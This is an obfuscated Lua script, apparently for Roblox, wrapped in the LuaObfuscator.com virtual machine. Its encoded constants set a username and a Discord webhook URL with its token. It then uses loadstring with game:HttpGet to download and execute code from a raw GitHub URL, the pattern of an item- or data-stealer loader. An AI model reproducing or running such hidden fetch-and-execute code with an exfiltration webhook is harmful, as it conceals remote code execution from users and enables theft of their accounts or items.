--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));return "";end end else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v30,16));if v19 then local v99=v5(v71,v19);v19=nil;return v99;else return v71;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v72=0 -0 ;local v73;while true do if (v72==((117 -(32 + 85)) -0)) then v73=(v31/((1 + 1)^(v32-(1 -(0 + 0)))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-1)) + (932 -(191 + 666 + 74)))) ;return v73-(v73%(569 -(367 + 201))) ;end end else local v74=(1067 -((1025 -(892 + 65)) + 997))^(v32-1) ;return (((v31%(v74 + v74))>=v74) and (928 -(214 + 713))) or (0 -0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;return (v36 * 256) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (4 -1) );v18=v18 + (354 -((213 -126) + 263)) ;return (v40 * 16777216) + (v39 * (65716 -(67 + 113))) + (v38 * (188 + 68)) + v37 ;end local function v24()local v41=0 + 0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==1) then v44=3 -2 ;v45=(v20(v43,1,972 -(802 + 150) ) * ((5 -(441 -(145 + 293)))^(462 -(44 + 386)))) + v42 ;v41=3 -1 ;end if ((2 + 0)==v41) then v46=v20(v43,21,(2514 -(998 + 488)) -(291 + 624 + 82) );v47=((v20(v43,90 -58 )==(1 + 0)) and  -(1 -0)) or 1 ;v41=3;end if (v41==(1187 -(1069 + 118))) then v42=v23();v43=v23();v41=2 -1 ;end if (v41==(6 -3)) then if (v46==(0 + 0)) then if (v45==(0 -0)) then return v47 * 0 ;else local v100=0 + 0 ;while true do if (v100==(791 -(368 + 423))) then v46=1;v44=0 -0 ;break;end end end elseif (v46==(2065 -(10 + 8))) then return ((v45==0) and (v47 * ((3 -2)/(442 -(416 + 26))))) or (v47 * NaN) ;end return v8(v47,v46-((2675 + 591) -2243) ) * (v44 + (v45/(((773 -(201 + 571)) + 1)^(91 -39)))) ;end end end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==0) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1139 -(116 + 1022)) );v18=v18 + v48 ;local v50={};for v67=1 + 0 , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 + 0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if ((1330 -(797 + 532))==v51) then v54=nil;v55=nil;v51=2 + 0 ;end if (v51~=2) then else v56=nil;v57=nil;v51=3;end if (v51==(1005 -(923 + 79))) then v58=nil;v59=nil;v51=4;end if (v51~=(1636 -(1373 + 263))) then else v52=0;v53=nil;v51=1 + 0 ;end if (v51~=4) then else while true do if (v52~=(1000 -(451 + 549))) then else local v95=1202 -(373 + 829) ;while true do if (v95==(1 + 0)) then v52=1131 -(369 + 761) ;break;end if (v95~=(0 -0)) then else v53=0 -0 ;v54=nil;v95=1 -0 ;end end end if (v52~=(241 -(64 + 174))) then else v59=nil;while true do local v101=1384 -(746 + 638) ;local v102;while true do if (v101==(0 -0)) then v102=0 + 0 ;while true do if (v102==0) then local v121=0 -0 ;while true do if (v121~=(341 -(218 + 123))) then else if (v53~=0) then else local v149=0;local v150;while true do if (v149==(1581 -(1535 + 46))) then v150=0 + 0 ;while true do if ((0 + 0)==v150) then v54={};v55={};v150=1 + 0 ;end if (v150~=2) then else v53=561 -(306 + 254) ;break;end if (v150~=(1 + 0)) then else local v155=0 -0 ;while true do if (v155~=1) then else v150=2;break;end if (v155==0) then v56={};v57={v54,v55,nil,v56};v155=2 -1 ;end end end end break;end end end if (v53==(1 + 0)) then local v151=1975 -(1913 + 62) ;local v152;local v153;while true do if (v151==(1 + 0)) then while true do if (v152~=(603 -(268 + 335))) then else v153=0 -0 ;while true do if (v153~=0) then else v58=v23();v59={};v153=291 -(60 + 230) ;end if (v153~=(1934 -(565 + 1368))) then else local v157=572 -(426 + 146) ;while true do if (v157==(0 + 0)) then for v165=1 -0 ,v58 do local v166=0 + 0 ;local v167;local v168;local v169;while true do if (0~=v166) then else local v170=1456 -(282 + 1174) ;while true do if (0~=v170) then else v167=811 -(569 + 242) ;v168=nil;v170=857 -(564 + 292) ;end if (v170~=(2 -1)) then else v166=2 -1 ;break;end end end if (v166==(1 + 0)) then v169=nil;while true do if ((1024 -(706 + 318))==v167) then local v177=0;local v178;while true do if (0==v177) then v178=1251 -(721 + 530) ;while true do if (v178==(1271 -(945 + 326))) then v168=v21();v169=nil;v178=2 -1 ;end if (1~=v178) then else v167=1 + 0 ;break;end end break;end end end if (v167~=(1126 -(936 + 189))) then else if (v168==(701 -(271 + 429))) then v169=v21()~=(0 + 0) ;elseif (v168==2) then v169=v24();elseif (v168~=3) then else v169=v25();end v59[v165]=v169;break;end end break;end end end v57[1 + 2 ]=v21();v157=1501 -(1408 + 92) ;end if (v157~=(1087 -(461 + 625))) then else v153=1290 -(993 + 295) ;break;end end end if ((1 + 1)~=v153) then else v53=1173 -(418 + 753) ;break;end end break;end end break;end if (v151~=0) then else v152=0;v153=nil;v151=1 + 0 ;end end end v121=1 + 0 ;end if (1==v121) then v102=268 -(176 + 91) ;break;end end end if (v102==1) then if (v53==2) then local v142=0 + 0 ;local v143;while true do if (v142~=(0 + 0)) then else v143=529 -(406 + 123) ;while true do local v154=1769 -(1749 + 20) ;while true do if (0~=v154) then else if (v143==(1093 -(975 + 117))) then return v57;end if (v143~=(1875 -(157 + 1718))) then else local v156=0 + 0 ;while true do if (v156==(1322 -(1249 + 73))) then for v158=1,v23() do local v159=0 + 0 ;local v160;local v161;while true do if (v159==(1145 -(466 + 679))) then v160=0 -0 ;v161=nil;v159=1;end if (v159~=(3 -2)) then else while true do if (v160==(0 -0)) then v161=v21();if (v20(v161,1,1019 -(697 + 321) )~=(0 -0)) then else local v171=0;local v172;local v173;local v174;local v175;local v176;while true do if (v171~=(3 -1)) then else v176=nil;while true do if (v172==0) then local v180=1900 -(106 + 1794) ;while true do if (v180==(1 + 0)) then v172=1;break;end if (v180~=0) then else v173=0 + 0 ;v174=nil;v180=1 + 0 ;end end end if (v172~=(5 -3)) then else while true do if (v173~=3) then else if (v20(v175,7 -4 ,3)~=1) then else v176[10 -6 ]=v59[v176[118 -(4 + 110) ]];end v54[v158]=v176;break;end if ((1190 -(449 + 740))==v173) then local v182=872 -(826 + 46) ;local v183;while true do if (0==v182) then v183=0;while true do if (v183==(947 -(245 + 702))) then local v190=0 -0 ;while true do if (v190==(585 -(57 + 527))) then v183=1428 -(41 + 1386) ;break;end if ((103 -(17 + 86))==v190) then v176={v22(),v22(),nil,nil};if (v174==(0 -0)) then local v195=0 -0 ;while true do if (v195~=(0 + 0)) then else v176[169 -(122 + 44) ]=v22();v176[6 -2 ]=v22();break;end end elseif (v174==(3 -2)) then v176[3 + 0 ]=v23();elseif (v174==(1 + 1)) then v176[3]=v23() -((3 -1)^(38 -22)) ;elseif (v174==(68 -(30 + 35))) then local v204=0;local v205;local v206;while true do if (v204~=(1 + 0)) then else while true do if (v205~=(1257 -(1043 + 214))) then else v206=0 -0 ;while true do if (v206==(1212 -(323 + 889))) then v176[7 -4 ]=v23() -(2^(1479 -(1404 + 59))) ;v176[584 -(361 + 219) ]=v22();break;end end break;end end break;end if (v204==(320 -(53 + 267))) then v205=0 + 0 ;v206=nil;v204=414 -(15 + 398) ;end end end v190=766 -(468 + 297) ;end end end if ((983 -(18 + 964))~=v183) then else v173=2;break;end end break;end end end if ((7 -5)~=v173) then else local v184=0 -0 ;local v185;while true do if (v184==(0 -0)) then v185=0;while true do if (v185~=(0 + 0)) then else local v191=0 + 0 ;local v192;while true do if (v191~=(850 -(20 + 830))) then else v192=0 + 0 ;while true do if (v192~=0) then else if (v20(v175,1,2 -1 )~=(127 -(116 + 10))) then else v176[4 -2 ]=v59[v176[1 + 1 ]];end if (v20(v175,1 + 1 ,2)==(739 -(542 + 196))) then v176[6 -3 ]=v59[v176[3]];end v192=1;end if (v192==(1 + 0)) then v185=1;break;end end break;end end end if ((1 -0)~=v185) then else v173=2 + 1 ;break;end end break;end end end if (v173~=(163 -(92 + 71))) then else local v186=0 + 0 ;local v187;while true do if ((0 + 0)~=v186) then else v187=0;while true do if (v187~=(0 -0)) then else local v193=0 + 0 ;local v194;while true do if ((0 + 0)~=v193) then else v194=0 -0 ;while true do if (v194~=(0 -0)) then else v174=v20(v161,1553 -(1126 + 425) ,408 -(118 + 287) );v175=v20(v161,15 -11 ,4 + 2 );v194=1122 -(118 + 1003) ;end if ((2 -1)==v194) then v187=378 -(142 + 235) ;break;end end break;end end end if (v187~=(4 -3)) then else v173=1;break;end end break;end end end end break;end if (1==v172) then v175=nil;v176=nil;v172=1792 -(573 + 1217) ;end end break;end if (v171~=1) then else v174=nil;v175=nil;v171=1 + 1 ;end if (v171==0) then v172=0;v173=nil;v171=1 + 0 ;end end end break;end end break;end end end for v162=978 -(553 + 424) ,v23() do v55[v162-1 ]=v28();end v156=1 -0 ;end if (v156==(1 + 0)) then v143=1 + 0 ;break;end end end break;end end end break;end end end break;end end break;end end end break;end if (v52~=2) then else local v96=0 + 0 ;local v97;while true do if ((0 + 0)~=v96) then else v97=0;while true do if (v97~=(2 -1)) then else v52=2 + 1 ;break;end if ((0 -0)~=v97) then else local v120=0;while true do if (v120==1) then v97=1;break;end if (v120==0) then v57=nil;v58=nil;v120=2 -1 ;end end end end break;end end end if (v52==(2 -1)) then local v98=0 + 0 ;while true do if ((1 -0)==v98) then v52=808 -(118 + 688) ;break;end if ((0 -0)==v98) then v55=nil;v56=nil;v98=754 -(239 + 514) ;end end end end break;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v78=v64;local v79=v65;local v80=v66;local v81=v27;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v92=0,v86 do if (v92>=v80) then v84[v92-v80 ]=v85[v92 + 1 ];else v88[v92]=v85[v92 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do v90=v78[v82];v91=v90[1];if (v91<=4) then if (v91<=1) then if (v91>0) then v88[v90[2]]();else v88[v90[2]]=v90[3];end elseif (v91<=2) then local v109=v90[2];local v110=v88[v90[3]];v88[v109 + 1 ]=v110;v88[v109]=v110[v90[4]];elseif (v91==3) then v88[v90[2]][v90[3]]=v90[4];else local v124=0;local v125;while true do if (v124==0) then v125=v90[2];v88[v125]=v88[v125](v13(v88,v125 + 1 ,v83));break;end end end elseif (v91<=6) then if (v91>5) then v88[v90[2]]=v90[3]~=0 ;else local v115=0;local v116;local v117;local v118;local v119;while true do if (v115==2) then for v144=v116,v83 do v119=v119 + 1 ;v88[v144]=v117[v119];end break;end if (v115==1) then v83=(v118 + v116) -1 ;v119=0;v115=2;end if (v115==0) then v116=v90[2];v117,v118=v81(v88[v116](v13(v88,v116 + 1 ,v90[3])));v115=1;end end end elseif (v91<=7) then do return;end elseif (v91>8) then local v126;local v127;v88[v90[2]]=v62[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]][v90[3]]=v90[4];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v62[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]][v90[3]]=v90[4];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v62[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]][v90[3]]=v90[4];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v62[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v62[v90[3]];v82=v82 + 1 ;v90=v78[v82];v127=v90[2];v126=v88[v90[3]];v88[v127 + 1 ]=v126;v88[v127]=v126[v90[4]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];else v88[v90[2]]=v62[v90[3]];end v82=v82 + 1 ;end end;end if (0==v63) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0A3O0003023O005F4703083O00557365724E616D65030C3O00696C6F7665737465616B323903093O00557365724E616D653203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039383138343135333533323436353138322F4879447A47494E544D694A3172336754724F65676B34456136685263684E646D555736446D384763654371756D6F4C696E5A4972447942674F4739553776394E43453947030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585A63726970742F6D61696E2F4C797068657253637269707473000F3O0012093O00013O00304O0002000300124O00013O00304O0004000300124O00013O00304O0005000600124O00073O00122O000100083O00202O00010001000900122O0003000A4O0006000400014O0005000100044O00045O00022O00013O000100012O00073O00017O00",v9(),...);end
